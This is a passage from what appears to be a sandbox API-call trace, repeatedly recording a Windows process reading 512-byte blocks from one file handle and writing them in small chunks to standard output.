lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, 
lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.371] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.371] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.372] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.372] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, 
lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.373] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.374] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] WriteFile (in: hFile=0x50, 
lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] GetFileType (hFile=0x50) returned 0x1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.375] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.375] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] GetFileType (hFile=0x50) returned 0x1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] GetFileType (hFile=0x50) returned 0x1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] GetFileType (hFile=0x50) returned 0x1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 
[0145.375] GetFileType (hFile=0x50) returned 0x1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.376] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.376] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: 
lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.377] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.378] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0145.378] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 
[0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.379] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.379] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 
